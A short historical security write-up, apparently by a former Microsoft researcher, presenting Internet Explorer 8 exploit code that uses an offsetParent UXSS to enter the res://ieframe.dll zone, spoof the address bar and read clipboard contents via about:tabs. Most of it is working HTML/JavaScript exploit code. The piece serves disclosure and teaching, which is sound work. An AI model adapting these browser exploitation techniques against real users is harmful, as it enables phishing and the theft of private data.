This builds on the offsetParent UXSS (entry #16) to reach the res://ieframe.dll zone. Once inside that zone, two things become possible: spoofing the address bar using dnserror.htm#arbitrary-url, and accessing IE8’s About:Tabs page — which in that build exposed clipboard contents, browsing history, and an InPrivate browsing trigger.
<iframe onload="iframe_onload()" src="res://ieframe.dll/feedbase.htm"
width="20" height="20" scrolling="no"></iframe>
<script language="JavaScript">
function iframe_onload()
{
// Use the offsetParent UXSS to get into the ieframe.dll document
window[0][0].location = "offsetparent.html";
}
function exploit_AddressBarSpoof()
{
document_of_ieframe_feedbase.parentWindow.win_dns_error =
window.open('res://ieframe.dll/dnserror.htm#http://www.google.com','ieframe_dll_window');
document_of_ieframe_feedbase.parentWindow.win_dns_error.location =
'res://ieframe.dll/dnserror.htm#http://www.google.com';
document_of_ieframe_feedbase.parentWindow.setTimeout(
'win_dns_error.document.body.innerHTML = "<h1>Hacked!</h1>"', 100);
}
function exploit_IE8_About_Tabs()
{
if (window.postMessage)
{
document_of_ieframe_feedbase.parentWindow.win_about_tabs =
window.open('about:tabs','ieframe_dll_window');
document_of_ieframe_feedbase.parentWindow.setTimeout(
'win_about_tabs.execScript("alert(\'Clipboard: \' + document.all.clipboardText.innerText)");' +
'win_about_tabs.execScript("document.all.startInPrivateBrowsingLinkClick.click()");',
100);
}
}
</script>The address bar spoof works because res://ieframe.dll/dnserror.htm#http://target.com displays the fragment as the visible URL while the real location stays hidden. The About:Tabs exploitation raises a broader question: why expose clipboard data in that page at all? There is no legitimate user benefit, and every time an attacker finds a path into res:// they gain clipboard read access for free.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.